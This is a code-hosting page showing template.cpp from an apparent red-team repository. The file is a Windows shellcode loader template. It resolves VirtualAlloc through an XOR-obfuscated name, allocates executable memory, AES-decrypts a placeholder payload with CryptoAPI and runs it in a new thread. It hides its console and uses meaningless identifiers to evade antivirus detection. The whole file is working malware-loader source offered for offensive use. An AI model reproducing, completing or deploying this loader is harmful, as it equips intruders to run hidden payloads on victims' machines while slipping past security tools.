Головна сторінка Огляд Довідка
Увійти
zhensolid
/
Home-Grown-Red-Team
1
0
Відгалуження 0
Файли Проблеми 0 Запити на злиття 0 Wiki
Дерево: 105fbbde81
Гілки Теги
Home-Grown-Red-...
/
Harriet
/
Harriet
/
FULLAes
/
template.cpp

template.cpp 2.5 KB
Історія Запис

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100 
  1. #include <windows.h>
    2. 

  2. #include <stdio.h>
    3. 

  3. #include <stdlib.h>
    4. 

  4. #include <string.h>
    5. 

  5. #include <wincrypt.h>
    6. 

  6. #pragma comment (lib, "crypt32.lib")
    7. 

  7. #pragma comment (lib, "advapi32")
    8. 

  8. #include <psapi.h>
    9. 

  9. #include <string.h>
    10. 

  10. #include <tlhelp32.h>
    11. 

  11. 

  12. LPVOID (WINAPI * Virt_Alloc)(  LPVOID lpAddress, SIZE_T dwSize, DWORD  flAllocationType, DWORD  flProtect);
    13. 

  13. 

  14. char XOR_VARIABLE []= "XOR_KEY";
    15. 

  15. 

  16. unsigned char Random9 []= VIRALO}; 
    17. 

  17. 

  18. 

  19. int Random1(char * different, unsigned int different_len, char * key, size_t keylen) {
    20. 

  20.         HCRYPTPROV hProv;
    21. 

  21.         HCRYPTHASH hHash;
    22. 

  22.         HCRYPTKEY hKey;
    23. 

  23. 

  24.         if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)){
    25. 

  25.                 return -1;
    26. 

  26.         }
    27. 

  27.         if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)){
    28. 

  28.                 return -1;
    29. 

  29.         }
    30. 

  30.         if (!CryptHashData(hHash, (BYTE*)key, (DWORD)keylen, 0)){
    31. 

  31.                 return -1;              
    32. 

  32.         }
    33. 

  33.         if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0,&hKey)){
    34. 

  34.                 return -1;
    35. 

  35.         }
    36. 

  36.         
    37. 

  37.         if (!CryptDecrypt(hKey, (HCRYPTHASH) NULL, 0, 0, different, &different_len)){
    38. 

  38.                 return -1;
    39. 

  39.         }
    40. 

  40.         
    41. 

  41.         CryptReleaseContext(hProv, 0);
    42. 

  42.         CryptDestroyHash(hHash);
    43. 

  43.         CryptDestroyKey(hKey);
    44. 

  44.         
    45. 

  45.         return 0;
    46. 

  46. }
    47. 

  47. 

  48. 

  49. void RandomA(char * tada, int tada_len, char * XOR_VARIABLE, size_t XOR_VARIABLE_len) {
    50. 

  50.         int r;
    51. 

  51.         r = 0;
    52. 

  52.         for (int i = 0; i < tada_len; i++) {
    53. 

  53.                 if (r == XOR_VARIABLE_len - 1) r = 0;
    54. 

  54. 

  55.                 tada[i] = tada[i] ^ XOR_VARIABLE[r];
    56. 

  56.                 r++;
    57. 

  57.         }
    58. 

  58. }
    59. 

  59. 

  60. int main(void) {
    61. 

  61. 	
    62. 

  62. 	void * Random6_mem;
    63. 

  63. 	BOOL Random8;
    64. 

  64. 	HANDLE th;
    65. 

  65.         DWORD oldprotect = 0;
    66. 

  66. 	
    67. 

  67. 	
    68. 

  68. 	char Random2[] = KEYVALUE
    69. 

  69. 	unsigned char Random3[] = PAYVAL
    70. 

  70. 	unsigned int Random7_len = sizeof(Random3);
    71. 

  71. 	
    72. 

  72. 	int pido = 0;
    73. 

  73.         HANDLE hProc = NULL;	
    74. 

  74. 	
    75. 

  75. 	
    76. 

  76. 	strrev(Random3);
    77. 

  77. 	FreeConsole();
    78. 

  78. 	strrev(Random3);
    79. 

  79. 

  80. 	RandomA((char *) Random9, sizeof (Random9), XOR_VARIABLE, sizeof(XOR_VARIABLE));
    81. 

  81.         Virt_Alloc= GetProcAddress(GetModuleHandle("kernel32.dll"), Random9);
    82. 

  82. 

  83. 	Random6_mem = Virt_Alloc(0, Random7_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    84. 

  84. 

  85. 	Random1((char *) Random3, Random7_len, Random2, sizeof(Random2));
    86. 

  86. 		
    87. 

  87. 

  88. 	RtlMoveMemory(Random6_mem, Random3, Random7_len);
    89. 

  89. 	
    90. 

  90. 

  91. 	Random8 = VirtualProtect(Random6_mem, Random7_len, PAGE_EXECUTE_READWRITE, &oldprotect);
    92. 

  92. 

  93. 	if ( Random8 != 0 ) {
    94. 

  94. 			th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) Random6_mem, 0, 0, 0);
    95. 

  95. 			WaitForSingleObject(th, -1);
    96. 

  96. 	}
    97. 

  97. 	
    98. 

  98. 	return 0;
    99. 

  99. }
    100. 

  100. 	
    101.